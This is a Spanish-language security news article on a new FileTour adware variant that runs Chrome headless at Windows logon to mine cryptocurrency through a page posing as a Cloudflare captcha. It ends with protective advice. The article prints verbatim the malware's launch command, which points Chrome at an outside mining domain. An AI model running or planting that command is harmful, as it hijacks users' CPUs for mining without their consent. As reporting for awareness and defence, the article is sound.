El Adware.FileTour, técnicamente no es considerado un virus potencial, aunque a veces actúa como tal, se trata de un paquete de malware que contiene muchas características maliciosas que pueden obtener control total del navegador y espiar las actividades del mismo, poniendo el riesgo la privacidad del usuario. Esto se debe a los adwares o PUP que vienen incluidos en FileTour, estos son programas maliciosos que se ejecutan sin el consentimiento del usuario.

El Adware.FileTour puede afectarte al ejecutar o descargar aplicaciones gratuitas desde Internet, podrás notar que te has infectado si tu navegador tiene una apariencia/comportamiento extraño, como por ejemplo barras de herramientas o nuevas extensiones que no instalaste, las ventanas del navegador se abren o cierran sin control alguno, etc. Ahora, una nueva versión de FileTour ha aparecido, este utiliza el navegador para minar criptomonedas.

De acuerdo con bleepingcomputer, esta nueva versión del paquete de adware,  crea una ejecución automática de Windows que permite ejecutar Chrome en segundo plano para que este conecte de forma remota a una página de minería. Para empeorar las cosas, lo hace de forma tal que es invisible para el usuario, pues no necesita abrir el navegador para hacerlo.

El comando que se ejecuta que iniciar el navegador Chrome es:

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4

Una vez que el usuario inicie sesión en Windows, este abre una sesión en Chrome, con la GPU desactivada, mediante el puerto de depuración remoto 9222 se conecta por cdn a la página en cuestión. Esta cargará un código en JavaScript de Coincube, similar al de Coinhive, que inicia la secuencia de comandos de minado en nuestro ordenador.

Esto hará que Chrome aumente hasta un 70-80% de consumo de CPU en el Administrador de tareas, ya que mina criptomonedas, aunque no esté visible en Windows.

La página a la que se conecta vía cdn simula ser un CloudFlare con un captcha solicitando al visitante que confirme si es humano.

¿Cómo protegerse de los mineros de criptomonedas?

Para protegerse de los scripts de minado, puedes usar extensiones que bloqueen o detecten las conexiones a distintos equipos de minado.

También se recomienda usar el sitio CoinBlockerLists para descargar listas de direcciones IP y dominios afiliados a la minería en el navegador.